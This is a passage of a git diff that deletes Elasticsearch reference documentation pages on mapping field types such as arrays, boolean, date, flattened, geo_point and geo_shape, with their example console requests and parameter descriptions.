] -* an array of objects: [ `{ "name": "Mary", "age": 12 }`, `{ "name": "John", "age": 10 }`] - -.Arrays of objects -[NOTE] -==================================================== - -Arrays of objects do not work as you would expect: you cannot query each -object independently of the other objects in the array. If you need to be -able to do this then you should use the <> data type instead -of the <> data type. - -This is explained in more detail in <>. -==================================================== - - -When adding a field dynamically, the first value in the array determines the -field `type`. All subsequent values must be of the same data type or it must -at least be possible to <> subsequent values to the same -data type. - -Arrays with a mixture of data types are _not_ supported: [ `10`, `"some string"` ] - -An array may contain `null` values, which are either replaced by the -configured <> or skipped entirely. An empty array -`[]` is treated as a missing field -- a field with no values. 
- -Nothing needs to be pre-configured in order to use arrays in documents, they -are supported out of the box: - - -[source,console] --------------------------------------------------- -PUT my-index-000001/_doc/1 -{ - "message": "some arrays in this document...", - "tags": [ "elasticsearch", "wow" ], <1> - "lists": [ <2> - { - "name": "prog_list", - "description": "programming list" - }, - { - "name": "cool_list", - "description": "cool stuff list" - } - ] -} - -PUT my-index-000001/_doc/2 <3> -{ - "message": "no arrays in this document...", - "tags": "elasticsearch", - "lists": { - "name": "prog_list", - "description": "programming list" - } -} - -GET my-index-000001/_search -{ - "query": { - "match": { - "tags": "elasticsearch" <4> - } - } -} --------------------------------------------------- - -<1> The `tags` field is dynamically added as a `string` field. -<2> The `lists` field is dynamically added as an `object` field. -<3> The second document contains no arrays, but can be indexed into the same fields. -<4> The query looks for `elasticsearch` in the `tags` field, and matches both documents. - -[[multi-value-fields-inverted-index]] -.Multi-value fields and the inverted index -**************************************************** - -The fact that all field types support multi-value fields out of the box is a -consequence of the origins of Lucene. Lucene was designed to be a full text -search engine. In order to be able to search for individual words within a -big block of text, Lucene tokenizes the text into individual terms, and -adds each term to the inverted index separately. - -This means that even a simple text field must be able to support multiple -values by default. When other data types were added, such as numbers and -dates, they used the same data structure as strings, and so got multi-values -for free. - -**************************************************** - diff --git a/docs/reference/mapping/types/binary.asciidoc b/docs/reference/mapping/types/binary.asciidoc deleted file mode 100644 index 032e7e6e1b5..00000000000 --- a/docs/reference/mapping/types/binary.asciidoc +++ /dev/null @@ -1,53 +0,0 @@ -[[binary]] -=== Binary field type -++++ -Binary -++++ - -The `binary` type accepts a binary value as a -{wikipedia}/Base64[Base64] encoded string. The field is not -stored by default and is not searchable: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "name": { - "type": "text" - }, - "blob": { - "type": "binary" - } - } - } -} - -PUT my-index-000001/_doc/1 -{ - "name": "Some binary blob", - "blob": "U29tZSBiaW5hcnkgYmxvYg==" <1> -} --------------------------------------------------- - -<1> The Base64 encoded binary value must not have embedded newlines `\n`. - -[[binary-params]] -==== Parameters for `binary` fields - -The following parameters are accepted by `binary` fields: - -[horizontal] - -<>:: - - Should the field be stored on disk in a column-stride fashion, so that it - can later be used for sorting, aggregations, or scripting? Accepts `true` - or `false` (default). - -<>:: - - Whether the field value should be stored and retrievable separately from - the <> field. Accepts `true` or `false` - (default). 
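For instance, a sketch of a `binary` field with both parameters enabled might look like this (whether you need either depends on how the value will be retrieved):

[source,console]
--------------------------------------------------
PUT my-index-000001
{
  "mappings": {
    "properties": {
      "blob": {
        "type": "binary",
        "doc_values": true, <1>
        "store": true <2>
      }
    }
  }
}
--------------------------------------------------

<1> Enables doc values for the field, which are off by default for `binary`.
<2> Stores the field so its value can be retrieved with `stored_fields`.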
diff --git a/docs/reference/mapping/types/boolean.asciidoc b/docs/reference/mapping/types/boolean.asciidoc deleted file mode 100644 index 01650ef118b..00000000000 --- a/docs/reference/mapping/types/boolean.asciidoc +++ /dev/null @@ -1,125 +0,0 @@ -[[boolean]] -=== Boolean field type -++++ -Boolean -++++ - -Boolean fields accept JSON `true` and `false` values, but can also accept -strings which are interpreted as either true or false: - -[horizontal] -False values:: - - `false`, `"false"`, `""` (empty string) - -True values:: - - `true`, `"true"` - -For example: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "is_published": { - "type": "boolean" - } - } - } -} - -POST my-index-000001/_doc/1 -{ - "is_published": "true" <1> -} - -GET my-index-000001/_search -{ - "query": { - "term": { - "is_published": true <2> - } - } -} --------------------------------------------------- - -<1> Indexing a document with `"true"`, which is interpreted as `true`. -<2> Searching for documents with a JSON `true`. - -Aggregations like the <> use `1` and `0` for the `key`, and the strings `"true"` and -`"false"` for the `key_as_string`. Boolean fields when used in scripts, -return `1` and `0`: - -[source,console] --------------------------------------------------- -POST my-index-000001/_doc/1 -{ - "is_published": true -} - -POST my-index-000001/_doc/2 -{ - "is_published": false -} - -GET my-index-000001/_search -{ - "aggs": { - "publish_state": { - "terms": { - "field": "is_published" - } - } - }, - "script_fields": { - "is_published": { - "script": { - "lang": "painless", - "source": "doc['is_published'].value" - } - } - } -} --------------------------------------------------- - -[[boolean-params]] -==== Parameters for `boolean` fields - -The following parameters are accepted by `boolean` fields: - -[horizontal] - -<>:: - - Mapping field-level query time boosting. Accepts a floating point number, defaults - to `1.0`. - -<>:: - - Should the field be stored on disk in a column-stride fashion, so that it - can later be used for sorting, aggregations, or scripting? Accepts `true` - (default) or `false`. - -<>:: - - Should the field be searchable? Accepts `true` (default) and `false`. - -<>:: - - Accepts any of the true or false values listed above. The value is - substituted for any explicit `null` values. Defaults to `null`, which - means the field is treated as missing. - -<>:: - - Whether the field value should be stored and retrievable separately from - the <> field. Accepts `true` or `false` - (default). - -<>:: - - Metadata about the field. diff --git a/docs/reference/mapping/types/constant-keyword.asciidoc b/docs/reference/mapping/types/constant-keyword.asciidoc deleted file mode 100644 index 20d394308ba..00000000000 --- a/docs/reference/mapping/types/constant-keyword.asciidoc +++ /dev/null @@ -1,88 +0,0 @@ -[role="xpack"] -[testenv="basic"] - -[discrete] -[[constant-keyword-field-type]] -=== Constant keyword field type - -Constant keyword is a specialization of the `keyword` field for -the case that all documents in the index have the same value. 
- -[source,console] --------------------------------- -PUT logs-debug -{ - "mappings": { - "properties": { - "@timestamp": { - "type": "date" - }, - "message": { - "type": "text" - }, - "level": { - "type": "constant_keyword", - "value": "debug" - } - } - } -} --------------------------------- - -`constant_keyword` supports the same queries and aggregations as `keyword` -fields do, but takes advantage of the fact that all documents have the same -value per index to execute queries more efficiently. - -It is both allowed to submit documents that don't have a value for the field or -that have a value equal to the value configured in mappings. The two below -indexing requests are equivalent: - -[source,console] --------------------------------- -POST logs-debug/_doc -{ - "date": "2019-12-12", - "message": "Starting up Elasticsearch", - "level": "debug" -} - -POST logs-debug/_doc -{ - "date": "2019-12-12", - "message": "Starting up Elasticsearch" -} --------------------------------- -//TEST[continued] - -However providing a value that is different from the one configured in the -mapping is disallowed. - -In case no `value` is provided in the mappings, the field will automatically -configure itself based on the value contained in the first indexed document. -While this behavior can be convenient, note that it means that a single -poisonous document can cause all other documents to be rejected if it had a -wrong value. - -Before a value has been provided (either through the mappings or from a -document), queries on the field will not match any documents. This includes - <> queries. - -The `value` of the field cannot be changed after it has been set. - -[discrete] -[[constant-keyword-params]] -==== Parameters for constant keyword fields - -The following mapping parameters are accepted: - -[horizontal] - -<>:: - - Metadata about the field. - -`value`:: - - The value to associate with all documents in the index. If this parameter - is not provided, it is set based on the first document that gets indexed. - diff --git a/docs/reference/mapping/types/date.asciidoc b/docs/reference/mapping/types/date.asciidoc deleted file mode 100644 index 65336772562..00000000000 --- a/docs/reference/mapping/types/date.asciidoc +++ /dev/null @@ -1,146 +0,0 @@ -[[date]] -=== Date field type -++++ -Date -++++ - -JSON doesn't have a date data type, so dates in Elasticsearch can either be: - -* strings containing formatted dates, e.g. `"2015-01-01"` or `"2015/01/01 12:10:30"`. -* a long number representing _milliseconds-since-the-epoch_. -* an integer representing _seconds-since-the-epoch_. - -NOTE: Values for _milliseconds-since-the-epoch_ and _seconds-since-the-epoch_ -must be non-negative. Use a formatted date to represent dates before 1970. - -Internally, dates are converted to UTC (if the time-zone is specified) and -stored as a long number representing milliseconds-since-the-epoch. - -Queries on dates are internally converted to range queries on this long -representation, and the result of aggregations and stored fields is converted -back to a string depending on the date format that is associated with the field. - -NOTE: Dates will always be rendered as strings, even if they were initially -supplied as a long in the JSON document. - -Date formats can be customised, but if no `format` is specified then it uses -the default: - - "strict_date_optional_time||epoch_millis" - -This means that it will accept dates with optional timestamps, which conform -to the formats supported by <> -or milliseconds-since-the-epoch. 
- -For instance: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "date": { - "type": "date" <1> - } - } - } -} - -PUT my-index-000001/_doc/1 -{ "date": "2015-01-01" } <2> - -PUT my-index-000001/_doc/2 -{ "date": "2015-01-01T12:10:30Z" } <3> - -PUT my-index-000001/_doc/3 -{ "date": 1420070400001 } <4> - -GET my-index-000001/_search -{ - "sort": { "date": "asc"} <5> -} --------------------------------------------------- - -<1> The `date` field uses the default `format`. -<2> This document uses a plain date. -<3> This document includes a time. -<4> This document uses milliseconds-since-the-epoch. -<5> Note that the `sort` values that are returned are all in milliseconds-since-the-epoch. - -[[multiple-date-formats]] -==== Multiple date formats - -Multiple formats can be specified by separating them with `||` as a separator. -Each format will be tried in turn until a matching format is found. The first -format will be used to convert the _milliseconds-since-the-epoch_ value back -into a string. - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "date": { - "type": "date", - "format": "yyyy-MM-dd HH:mm:ss||yyyy-MM-dd||epoch_millis" - } - } - } -} --------------------------------------------------- - -[[date-params]] -==== Parameters for `date` fields - -The following parameters are accepted by `date` fields: - -[horizontal] - -<>:: - - Mapping field-level query time boosting. Accepts a floating point number, defaults - to `1.0`. - -<>:: - - Should the field be stored on disk in a column-stride fashion, so that it - can later be used for sorting, aggregations, or scripting? Accepts `true` - (default) or `false`. - -<>:: - - The date format(s) that can be parsed. Defaults to - `strict_date_optional_time||epoch_millis`. - -`locale`:: - - The locale to use when parsing dates since months do not have the same names - and/or abbreviations in all languages. The default is the - https://docs.oracle.com/javase/8/docs/api/java/util/Locale.html#ROOT[`ROOT` locale], - -<>:: - - If `true`, malformed numbers are ignored. If `false` (default), malformed - numbers throw an exception and reject the whole document. - -<>:: - - Should the field be searchable? Accepts `true` (default) and `false`. - -<>:: - - Accepts a date value in one of the configured +format+'s as the field - which is substituted for any explicit `null` values. Defaults to `null`, - which means the field is treated as missing. - -<>:: - - Whether the field value should be stored and retrievable separately from - the <> field. Accepts `true` or `false` - (default). - -<>:: - - Metadata about the field. diff --git a/docs/reference/mapping/types/date_nanos.asciidoc b/docs/reference/mapping/types/date_nanos.asciidoc deleted file mode 100644 index 26961cac1e2..00000000000 --- a/docs/reference/mapping/types/date_nanos.asciidoc +++ /dev/null @@ -1,102 +0,0 @@ -[[date_nanos]] -=== Date nanoseconds field type -++++ -Date nanoseconds -++++ - -This data type is an addition to the `date` data type. However there is an -important distinction between the two. The existing `date` data type stores -dates in millisecond resolution. The `date_nanos` data type stores dates -in nanosecond resolution, which limits its range of dates from roughly -1970 to 2262, as dates are still stored as a long representing nanoseconds -since the epoch. 
- -Queries on nanoseconds are internally converted to range queries on this long -representation, and the result of aggregations and stored fields is converted -back to a string depending on the date format that is associated with the field. - -Date formats can be customised, but if no `format` is specified then it uses -the default: - - "strict_date_optional_time||epoch_millis" - -This means that it will accept dates with optional timestamps, which conform -to the formats supported by -<> including up to nine second -fractionals or milliseconds-since-the-epoch (thus losing precision on the -nano second part). Using <> will -format the result up to only three second fractionals. To -print and parse up to nine digits of resolution, use <>. - -For instance: - -[source,console] --------------------------------------------------- -PUT my-index-000001?include_type_name=true -{ - "mappings": { - "_doc": { - "properties": { - "date": { - "type": "date_nanos" <1> - } - } - } - } -} - -PUT my-index-000001/_doc/1 -{ "date": "2015-01-01" } <2> - -PUT my-index-000001/_doc/2 -{ "date": "2015-01-01T12:10:30.123456789Z" } <3> - -PUT my-index-000001/_doc/3 -{ "date": 1420070400 } <4> - -GET my-index-000001/_search -{ - "sort": { "date": "asc"} <5> -} - -GET my-index-000001/_search -{ - "script_fields" : { - "my_field" : { - "script" : { - "lang" : "painless", - "source" : "doc['date'].value.nano" <6> - } - } - } -} - -GET my-index-000001/_search -{ - "docvalue_fields" : [ - { - "field" : "date", - "format": "strict_date_time" <7> - } - ] -} --------------------------------------------------- - -<1> The `date` field uses the default `format`. -<2> This document uses a plain date. -<3> This document includes a time. -<4> This document uses milliseconds-since-the-epoch. -<5> Note that the `sort` values that are returned are all in -nanoseconds-since-the-epoch. -<6> Access the nanosecond part of the date in a script -<7> Use doc value fields, which can be formatted in nanosecond -resolution - -You can also specify multiple date formats separated by `||`. The -same mapping parameters than with the `date` field can be used. - -[[date-nanos-limitations]] -==== Limitations - -Aggregations are still on millisecond resolution, even when using a `date_nanos` -field. This limitation also affects <>. diff --git a/docs/reference/mapping/types/dense-vector.asciidoc b/docs/reference/mapping/types/dense-vector.asciidoc deleted file mode 100644 index bd8bf775092..00000000000 --- a/docs/reference/mapping/types/dense-vector.asciidoc +++ /dev/null @@ -1,54 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[dense-vector]] -=== Dense vector field type -++++ -Dense vector -++++ - -A `dense_vector` field stores dense vectors of float values. -The maximum number of dimensions that can be in a vector should -not exceed 2048. A `dense_vector` field is a single-valued field. - -These vectors can be used for <>. -For example, a document score can represent a distance between -a given query vector and the indexed document vector. - -You index a dense vector as an array of floats. 
- -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "my_vector": { - "type": "dense_vector", - "dims": 3 <1> - }, - "my_text" : { - "type" : "keyword" - } - } - } -} - -PUT my-index-000001/_doc/1 -{ - "my_text" : "text1", - "my_vector" : [0.5, 10, 6] -} - -PUT my-index-000001/_doc/2 -{ - "my_text" : "text2", - "my_vector" : [-0.5, 10, 10] -} - --------------------------------------------------- - -<1> dims—the number of dimensions in the vector, required parameter. - -Internally, each document's dense vector is encoded as a binary -doc value. Its size in bytes is equal to -`4 * dims + 4`, where `dims`—the number of the vector's dimensions. diff --git a/docs/reference/mapping/types/flattened.asciidoc b/docs/reference/mapping/types/flattened.asciidoc deleted file mode 100644 index c5cd3fd2fe5..00000000000 --- a/docs/reference/mapping/types/flattened.asciidoc +++ /dev/null @@ -1,191 +0,0 @@ -[role="xpack"] -[testenv="basic"] - -[[flattened]] -=== Flattened field type -++++ -Flattened -++++ - -By default, each subfield in an object is mapped and indexed separately. If -the names or types of the subfields are not known in advance, then they are -<>. - -The `flattened` type provides an alternative approach, where the entire -object is mapped as a single field. Given an object, the `flattened` -mapping will parse out its leaf values and index them into one field as -keywords. The object's contents can then be searched through simple queries -and aggregations. - -This data type can be useful for indexing objects with a large or unknown -number of unique keys. Only one field mapping is created for the whole JSON -object, which can help prevent a <> -from having too many distinct field mappings. - -On the other hand, flattened object fields present a trade-off in terms of -search functionality. Only basic queries are allowed, with no support for -numeric range queries or highlighting. Further information on the limitations -can be found in the <> section. - -NOTE: The `flattened` mapping type should **not** be used for indexing all -document content, as it treats all values as keywords and does not provide full -search functionality. The default approach, where each subfield has its own -entry in the mappings, works well in the majority of cases. - -An flattened object field can be created as follows: - -[source,console] --------------------------------- -PUT bug_reports -{ - "mappings": { - "properties": { - "title": { - "type": "text" - }, - "labels": { - "type": "flattened" - } - } - } -} - -POST bug_reports/_doc/1 -{ - "title": "Results are not sorted correctly.", - "labels": { - "priority": "urgent", - "release": ["v1.2.5", "v1.3.0"], - "timestamp": { - "created": 1541458026, - "closed": 1541457010 - } - } -} --------------------------------- -// TESTSETUP - -During indexing, tokens are created for each leaf value in the JSON object. The -values are indexed as string keywords, without analysis or special handling for -numbers or dates. 
- -Querying the top-level `flattened` field searches all leaf values in the -object: - -[source,console] --------------------------------- -POST bug_reports/_search -{ - "query": { - "term": {"labels": "urgent"} - } -} --------------------------------- - -To query on a specific key in the flattened object, object dot notation is used: - -[source,console] --------------------------------- -POST bug_reports/_search -{ - "query": { - "term": {"labels.release": "v1.3.0"} - } -} --------------------------------- - -[[supported-operations]] -==== Supported operations - -Because of the similarities in the way values are indexed, `flattened` -fields share much of the same mapping and search functionality as -<> fields. - -Currently, flattened object fields can be used with the following query types: - -- `term`, `terms`, and `terms_set` -- `prefix` -- `range` -- `match` and `multi_match` -- `query_string` and `simple_query_string` -- `exists` - -When querying, it is not possible to refer to field keys using wildcards, as in -`{ "term": {"labels.time*": 1541457010}}`. Note that all queries, including -`range`, treat the values as string keywords. Highlighting is not supported on -`flattened` fields. - -It is possible to sort on an flattened object field, as well as perform simple -keyword-style aggregations such as `terms`. As with queries, there is no -special support for numerics -- all values in the JSON object are treated as -keywords. When sorting, this implies that values are compared -lexicographically. - -Flattened object fields currently cannot be stored. It is not possible to -specify the <> parameter in the mapping. - -[[flattened-params]] -==== Parameters for flattened object fields - -The following mapping parameters are accepted: - -[horizontal] - -<>:: - - Mapping field-level query time boosting. Accepts a floating point number, - defaults to `1.0`. - -`depth_limit`:: - - The maximum allowed depth of the flattened object field, in terms of nested - inner objects. If a flattened object field exceeds this limit, then an - error will be thrown. Defaults to `20`. Note that `depth_limit` can be - updated dynamically through the <> API. - -<>:: - - Should the field be stored on disk in a column-stride fashion, so that it - can later be used for sorting, aggregations, or scripting? Accepts `true` - (default) or `false`. - -<>:: - - Should global ordinals be loaded eagerly on refresh? Accepts `true` or - `false` (default). Enabling this is a good idea on fields that are - frequently used for terms aggregations. - -<>:: - - Leaf values longer than this limit will not be indexed. By default, there - is no limit and all values will be indexed. Note that this limit applies - to the leaf values within the flattened object field, and not the length of - the entire field. - -<>:: - - Determines if the field should be searchable. Accepts `true` (default) or - `false`. - -<>:: - - What information should be stored in the index for scoring purposes. - Defaults to `docs` but can also be set to `freqs` to take term frequency - into account when computing scores. - -<>:: - - A string value which is substituted for any explicit `null` values within - the flattened object field. Defaults to `null`, which means null sields are - treated as if it were missing. - -<>:: - - Which scoring algorithm or _similarity_ should be used. Defaults - to `BM25`. - -`split_queries_on_whitespace`:: - - Whether <> should split the input on - whitespace when building a query for this field. 
Accepts `true` or `false` - (default). diff --git a/docs/reference/mapping/types/geo-point.asciidoc b/docs/reference/mapping/types/geo-point.asciidoc deleted file mode 100644 index 11585db8830..00000000000 --- a/docs/reference/mapping/types/geo-point.asciidoc +++ /dev/null @@ -1,158 +0,0 @@ -[[geo-point]] -=== Geo-point field type -++++ -Geo-point -++++ - -Fields of type `geo_point` accept latitude-longitude pairs, which can be used: - -* to find geo-points within a <>, - within a certain <> of a central point, - or within a <> or within a <>. -* to aggregate documents <> - or by <> from a central point. -* to integrate distance into a document's <>. -* to <> documents by distance. - -There are five ways that a geo-point may be specified, as demonstrated below: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "location": { - "type": "geo_point" - } - } - } -} - -PUT my-index-000001/_doc/1 -{ - "text": "Geo-point as an object", - "location": { <1> - "lat": 41.12, - "lon": -71.34 - } -} - -PUT my-index-000001/_doc/2 -{ - "text": "Geo-point as a string", - "location": "41.12,-71.34" <2> -} - -PUT my-index-000001/_doc/3 -{ - "text": "Geo-point as a geohash", - "location": "drm3btev3e86" <3> -} - -PUT my-index-000001/_doc/4 -{ - "text": "Geo-point as an array", - "location": [ -71.34, 41.12 ] <4> -} - -PUT my-index-000001/_doc/5 -{ - "text": "Geo-point as a WKT POINT primitive", - "location" : "POINT (-71.34 41.12)" <5> -} - -GET my-index-000001/_search -{ - "query": { - "geo_bounding_box": { <6> - "location": { - "top_left": { - "lat": 42, - "lon": -72 - }, - "bottom_right": { - "lat": 40, - "lon": -74 - } - } - } - } -} --------------------------------------------------- - -<1> Geo-point expressed as an object, with `lat` and `lon` keys. -<2> Geo-point expressed as a string with the format: `"lat,lon"`. -<3> Geo-point expressed as a geohash. -<4> Geo-point expressed as an array with the format: [ `lon`, `lat`] -<5> Geo-point expressed as a https://docs.opengeospatial.org/is/12-063r5/12-063r5.html[Well-Known Text] -POINT with the format: `"POINT(lon lat)"` -<6> A geo-bounding box query which finds all geo-points that fall inside the box. - -[IMPORTANT] -.Geo-points expressed as an array or string -================================================== - -Please note that string geo-points are ordered as `lat,lon`, while array -geo-points are ordered as the reverse: `lon,lat`. - -Originally, `lat,lon` was used for both array and string, but the array -format was changed early on to conform to the format used by GeoJSON. - -================================================== - -[NOTE] -A point can be expressed as a {wikipedia}/Geohash[geohash]. -Geohashes are {wikipedia}/Base32[base32] encoded strings of -the bits of the latitude and longitude interleaved. Each character in a geohash -adds additional 5 bits to the precision. So the longer the hash, the more -precise it is. For the indexing purposed geohashs are translated into -latitude-longitude pairs. During this process only first 12 characters are -used, so specifying more than 12 characters in a geohash doesn't increase the -precision. The 12 characters provide 60 bits, which should reduce a possible -error to less than 2cm. - -[[geo-point-params]] -==== Parameters for `geo_point` fields - -The following parameters are accepted by `geo_point` fields: - -[horizontal] - -<>:: - - If `true`, malformed geo-points are ignored. 
If `false` (default), - malformed geo-points throw an exception and reject the whole document. - -`ignore_z_value`:: - - If `true` (default) three dimension points will be accepted (stored in source) - but only latitude and longitude values will be indexed; the third dimension is - ignored. If `false`, geo-points containing any more than latitude and longitude - (two dimensions) values throw an exception and reject the whole document. - -<>:: - - Accepts an geopoint value which is substituted for any explicit `null` values. - Defaults to `null`, which means the field is treated as missing. - -==== Using geo-points in scripts - -When accessing the value of a geo-point in a script, the value is returned as -a `GeoPoint` object, which allows access to the `.lat` and `.lon` values -respectively: - -[source,painless] --------------------------------------------------- -def geopoint = doc['location'].value; -def lat = geopoint.lat; -def lon = geopoint.lon; --------------------------------------------------- - -For performance reasons, it is better to access the lat/lon values directly: - -[source,painless] --------------------------------------------------- -def lat = doc['location'].lat; -def lon = doc['location'].lon; --------------------------------------------------- diff --git a/docs/reference/mapping/types/geo-shape.asciidoc b/docs/reference/mapping/types/geo-shape.asciidoc deleted file mode 100644 index 7945c4435a4..00000000000 --- a/docs/reference/mapping/types/geo-shape.asciidoc +++ /dev/null @@ -1,674 +0,0 @@ -[[geo-shape]] -=== Geo-shape field type -++++ -Geo-shape -++++ - -The `geo_shape` data type facilitates the indexing of and searching -with arbitrary geo shapes such as rectangles and polygons. It should be -used when either the data being indexed or the queries being executed -contain shapes other than just points. - -You can query documents using this type using -<>. - -[[geo-shape-mapping-options]] -[discrete] -==== Mapping Options - -The geo_shape mapping maps geo_json geometry objects to the geo_shape -type. To enable it, users must explicitly map fields to the geo_shape -type. - -[cols="<,<,<",options="header",] -|======================================================================= -|Option |Description| Default - -|`tree` |deprecated[6.6, PrefixTrees no longer used] Name of the PrefixTree -implementation to be used: `geohash` for GeohashPrefixTree and `quadtree` -for QuadPrefixTree. Note: This parameter is only relevant for `term` and -`recursive` strategies. -| `quadtree` - -|`precision` |deprecated[6.6, PrefixTrees no longer used] This parameter may -be used instead of `tree_levels` to set an appropriate value for the -`tree_levels` parameter. The value specifies the desired precision and -Elasticsearch will calculate the best tree_levels value to honor this -precision. The value should be a number followed by an optional distance -unit. Valid distance units include: `in`, `inch`, `yd`, `yard`, `mi`, -`miles`, `km`, `kilometers`, `m`,`meters`, `cm`,`centimeters`, `mm`, -`millimeters`. Note: This parameter is only relevant for `term` and -`recursive` strategies. -| `50m` - -|`tree_levels` |deprecated[6.6, PrefixTrees no longer used] Maximum number -of layers to be used by the PrefixTree. This can be used to control the -precision of shape representations andtherefore how many terms are -indexed. Defaults to the default value of the chosen PrefixTree -implementation. 
Since this parameter requires a certain level of -understanding of the underlying implementation, users may use the -`precision` parameter instead. However, Elasticsearch only uses the -tree_levels parameter internally and this is what is returned via the -mapping API even if you use the precision parameter. Note: This parameter -is only relevant for `term` and `recursive` strategies. -| various - -|`strategy` |deprecated[6.6, PrefixTrees no longer used] The strategy -parameter defines the approach for how to represent shapes at indexing -and search time. It also influences the capabilities available so it -is recommended to let Elasticsearch set this parameter automatically. -There are two strategies available: `recursive`, and `term`. -Recursive and Term strategies are deprecated and will be removed in a -future version. While they are still available, the Term strategy -supports point types only (the `points_only` parameter will be -automatically set to true) while Recursive strategy supports all -shape types. (IMPORTANT: see <> for more -detailed information about these strategies) -| `recursive` - -|`distance_error_pct` |deprecated[6.6, PrefixTrees no longer used] Used as a -hint to the PrefixTree about how precise it should be. Defaults to 0.025 (2.5%) -with 0.5 as the maximum supported value. PERFORMANCE NOTE: This value will -default to 0 if a `precision` or `tree_level` definition is explicitly defined. -This guarantees spatial precision at the level defined in the mapping. This can -lead to significant memory usage for high resolution shapes with low error -(e.g., large shapes at 1m with < 0.001 error). To improve indexing performance -(at the cost of query accuracy) explicitly define `tree_level` or `precision` -along with a reasonable `distance_error_pct`, noting that large shapes will have -greater false positives. Note: This parameter is only relevant for `term` and -`recursive` strategies. -| `0.025` - -|`orientation` -a|Optional. Vertex order for the shape's coordinates list. - -This parameter sets and returns only a `RIGHT` (counterclockwise) or `LEFT` -(clockwise) value. However, you can specify either value in multiple ways. - -To set `RIGHT`, use one of the following arguments or its uppercase -variant: - -* `right` -* `counterclockwise` -* `ccw` - -To set `LEFT`, use one of the following arguments or its uppercase -variant: - -* `left` -* `clockwise` -* `cw` - -Defaults to `RIGHT` to comply with https://www.ogc.org/docs/is[OGC standards]. -OGC standards define outer ring vertices in counterclockwise order with inner -ring (hole) vertices in clockwise order. - -Individual GeoJSON or WKT documents can override this parameter. -| `RIGHT` - -|`points_only` |deprecated[6.6, PrefixTrees no longer used] Setting this option to -`true` (defaults to `false`) configures the `geo_shape` field type for point -shapes only (NOTE: Multi-Points are not yet supported). This optimizes index and -search performance for the `geohash` and `quadtree` when it is known that only points -will be indexed. At present geo_shape queries can not be executed on `geo_point` -field types. This option bridges the gap by improving point performance on a -`geo_shape` field so that `geo_shape` queries are optimal on a point only field. -| `false` - -|`ignore_malformed` |If true, malformed GeoJSON or WKT shapes are ignored. If -false (default), malformed GeoJSON and WKT shapes throw an exception and reject the -entire document. 
-| `false` - -|`ignore_z_value` |If `true` (default) three dimension points will be accepted (stored in source) -but only latitude and longitude values will be indexed; the third dimension is ignored. If `false`, -geo-points containing any more than latitude and longitude (two dimensions) values throw an exception -and reject the whole document. -| `true` - -|`coerce` |If `true` unclosed linear rings in polygons will be automatically closed. -| `false` - -|======================================================================= - - -[[geoshape-indexing-approach]] -[discrete] -==== Indexing approach -GeoShape types are indexed by decomposing the shape into a triangular mesh and -indexing each triangle as a 7 dimension point in a BKD tree. This provides -near perfect spatial resolution (down to 1e-7 decimal degree precision) since all -spatial relations are computed using an encoded vector representation of the -original shape instead of a raster-grid representation as used by the -<> indexing approach. Performance of the tessellator primarily -depends on the number of vertices that define the polygon/multi-polygon. While -this is the default indexing technique prefix trees can still be used by setting -the `tree` or `strategy` parameters according to the appropriate -<>. Note that these parameters are now deprecated -and will be removed in a future version. - -*IMPORTANT NOTES* - -`CONTAINS` relation query - when using the new default vector indexing strategy, `geo_shape` -queries with `relation` defined as `contains` are supported for indices created with -ElasticSearch 7.5.0 or higher. - - -[[prefix-trees]] -[discrete] -==== Prefix trees - -deprecated[6.6, PrefixTrees no longer used] To efficiently represent shapes in -an inverted index, Shapes are converted into a series of hashes representing -grid squares (commonly referred to as "rasters") using implementations of a -PrefixTree. The tree notion comes from the fact that the PrefixTree uses multiple -grid layers, each with an increasing level of precision to represent the Earth. -This can be thought of as increasing the level of detail of a map or image at higher -zoom levels. Since this approach causes precision issues with indexed shape, it has -been deprecated in favor of a vector indexing approach that indexes the shapes as a -triangular mesh (see <>). - -Multiple PrefixTree implementations are provided: - -* GeohashPrefixTree - Uses -{wikipedia}/Geohash[geohashes] for grid squares. -Geohashes are base32 encoded strings of the bits of the latitude and -longitude interleaved. So the longer the hash, the more precise it is. -Each character added to the geohash represents another tree level and -adds 5 bits of precision to the geohash. A geohash represents a -rectangular area and has 32 sub rectangles. The maximum number of levels -in Elasticsearch is 24; the default is 9. -* QuadPrefixTree - Uses a -{wikipedia}/Quadtree[quadtree] for grid squares. -Similar to geohash, quad trees interleave the bits of the latitude and -longitude the resulting hash is a bit set. A tree level in a quad tree -represents 2 bits in this bit set, one for each coordinate. The maximum -number of levels for the quad trees in Elasticsearch is 29; the default is 21. - -[[spatial-strategy]] -[discrete] -===== Spatial strategies -deprecated[6.6, PrefixTrees no longer used] The indexing implementation -selected relies on a SpatialStrategy for choosing how to decompose the shapes -(either as grid squares or a tessellated triangular mesh). 
Each strategy -answers the following: - -* What type of Shapes can be indexed? -* What types of Query Operations and Shapes can be used? -* Does it support more than one Shape per field? - -The following Strategy implementations (with corresponding capabilities) -are provided: - -[cols="<,<,<,<",options="header",] -|======================================================================= -|Strategy |Supported Shapes |Supported Queries |Multiple Shapes - -|`recursive` |<> |`INTERSECTS`, `DISJOINT`, `WITHIN`, `CONTAINS` |Yes -|`term` |<> |`INTERSECTS` |Yes - -|======================================================================= - -[discrete] -===== Accuracy - -`Recursive` and `Term` strategies do not provide 100% accuracy and depending on -how they are configured it may return some false positives for `INTERSECTS`, -`WITHIN` and `CONTAINS` queries, and some false negatives for `DISJOINT` queries. -To mitigate this, it is important to select an appropriate value for the tree_levels -parameter and to adjust expectations accordingly. For example, a point may be near -the border of a particular grid cell and may thus not match a query that only matches -the cell right next to it -- even though the shape is very close to the point. - -[discrete] -===== Example - -[source,console] --------------------------------------------------- -PUT /example -{ - "mappings": { - "properties": { - "location": { - "type": "geo_shape" - } - } - } -} --------------------------------------------------- -// TESTSETUP - -This mapping definition maps the location field to the geo_shape -type using the default vector implementation. It provides -approximately 1e-7 decimal degree precision. - -[discrete] -===== Performance considerations with Prefix Trees - -deprecated[6.6, PrefixTrees no longer used] With prefix trees, -Elasticsearch uses the paths in the tree as terms in the inverted index -and in queries. The higher the level (and thus the precision), the more -terms are generated. Of course, calculating the terms, keeping them in -memory, and storing them on disk all have a price. Especially with higher -tree levels, indices can become extremely 